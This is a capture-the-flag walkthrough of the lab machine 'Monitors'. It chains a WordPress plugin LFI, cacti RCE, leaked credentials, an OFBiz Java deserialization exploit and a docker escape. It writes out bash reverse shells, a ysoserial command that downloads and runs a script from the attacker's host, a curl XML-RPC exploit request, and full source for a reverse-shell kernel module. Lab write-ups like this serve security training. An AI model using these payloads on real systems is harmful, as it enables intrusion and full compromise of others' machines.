As always, we start with nmap to discover open ports/services.
Nmap Scan
nmap -sC -sV -oA monitors 10.10.10.238
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-30 21:36 EET
Nmap scan report for 10.10.10.238
Host is up (0.096s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
| 256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_ 256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelThere are two open ports:
22 => ssh
80 => http
And both services version are not vulnerable to any critical vulnerability, so lets enumerate port 80.
HTTP Enumeration
We can’t access the site with the IP and it gave us a domain monitors.htb so lets add it to /etc/hosts file and visit it using the domain name.
Also whenever you have a domain name, run subdomain bruteforcer maybe you find hidden subdomains. In my case i couldn’t find any subdomain.
It’s a wordpress site and notice the copyright (2018) means it’s an old website, we may find a vulnerability in wordpress or any of its plugins.
The first thing I did is I ran wpscan on the site to enumerate wordpress. wpscan --url http://monitors.htb/ --detection-mode aggressive -e at,ap,u
It enumerated wordpress version (5.5.1) and a plugin called wp-with-spritz (1.0) which is vulnerable to LFI.
Going to the same path as the exploit says, we were able to read /etc/passwd so we have a LFI vulnerability.
Now lets read apache sites-enabled file maybe there is virtual host that we didn’t get when we did subdomain bruteforce.
Lets use curl because it’s much easier to read the output.
There is a subdomain cacti-admin.monitors.htb to add to our /etc/hosts, and two conf files to check.
The domain monitors.htb has it’s files located in /var/www/wordpress.
And the files of the subdomain cacti-admin.monitors.htb is in /usr/share/cacti.
We may need this information later. Now lets add this subdomain to our hosts file and visit it.
This subdomain is running cacti (1.2.12), lets google this version for public exploits.
Cacti is an open-source, web-based network monitoring and graphing tool designed as a front-end application for the open-source, industry-standard data logging tool RRDtool. Cacti allows a user to poll services at predetermined intervals and graph the resulting data.
I found Authenticated SQL Injection / RCE, but we don’t have any credentials yet.
But as you know (or don’t know), wordpress has a file called wp-config.php which contains the credentials for the database.
So lets read it with php filter wrapper using the LFI we got before.
Then we need to base64 decode this string. And we have a password BestAdministrator@2020!
Initial Foothold
Lets try to login to cacti.
Tried wpadmin:BestAdministrator@2020! and didn’t work, but admin:BestAdministrator@2020! worked and logged in successfully.
Now lets use the exploit to get a shell.
We have shell as www-data, now lets enumerate the box.
Lateral Movement
While enumerating the box, I found .backup directory in marcus home directory but we can’t access it.
And after wasting a lot of time, i found Cacti Backup Service file that executes /home/marcus/.backup/backup.sh.
And we can read backup.sh although we couldn’t list .backup directory.
There’s config_pass that has the password VerticalEdge2020.
Lets try ssh to user marcus with this password.
And we are now user marcus.
Getting root
There’s notes.txt file in home directory that saying update docker image for production use.
I don’t have permission to use docker command and the docker version doesn’t have any serious vulnerabilities, so lets look for something else.
There is port 8443 running on localhost, lets setup port forwarding so we can connect to it from our machine.
ssh -L 127.0.0.1:9001:127.0.0.1:8443 marcus@10.10.10.238
Now we are forwarding the traffic from our machine on port 9001 to port 8443 on the other machine.
Lets visit http://127.0.0.1:9001
It’s using https not http, so lets visit https://127.0.0.1:9001 instead
It’s running tomcat 9.0.31, but I couldn’t find any useful vulnerability for this version. I think we should run a directory buster.
gobuster dir -u https://127.0.0.1:9001 -k -w /usr/share/seclist/Discovery/Web-Content/raft-small-words.txt
When I visit most of these directories it forwards me to this login page, which is OFBiz 17.12.01.
I tried default credentials but doesn’t work, so I looked for public exploits and found this RCE.
Exploitation Steps:
1- Create a bash file that contains a reverse shell.
cat shell.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.x.x/8001 0>&12- Download YsoSerial tool to generate payloads that exploit unsafe Java object deserialization.
3- Generate payload via ysoserial JAR File
java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "wget 10.10.x.x/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n"4- Copy the generated string and run a python webserver.
sudo python3 -m http.server 80
5- Use the below curl command to execute our payload.
curl https://127.0.0.1:9001/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">PAYLOAD</serializable></value></member></struct></value></param></params></methodCall>' -k -H 'Content-Type:application/xml'After executing the curl command i got a hit on my python server. Our shell is on the server inside tmp directory, now we will create another payload to execute our file.
6- Run a netcat listener.
nc -nvlp 1337
7- Create another payload to execute the downloaded shell file.
java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n"8- Copy the generated string and paste it inside the curl command.
And we have a root shell but inside a docker container (not on the main host), so we need to escape from the container.
Running capsh --print we have the CAP_SYS_MODULE capability that we can abuse to get a shell on the host machine. We will follow the steps in the following link to get shell on the box.
First we will create a kernel module that contains our reverse shell. Note that the IP address in the code is the IP of the machine (not ours) because the docker container is not reachable for us.
reverse-shell.c
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.10.238/1337 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);Then we will create Makefile to compile it.
Makefile
obj-m +=reverse-shell.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) cleanThen run make to compile the code.
Finally, run a netcat listener on the host (victim) machine (not our machine) and run insmod reverse-shell.ko on the docker shell.
And we are now root on the monitors!
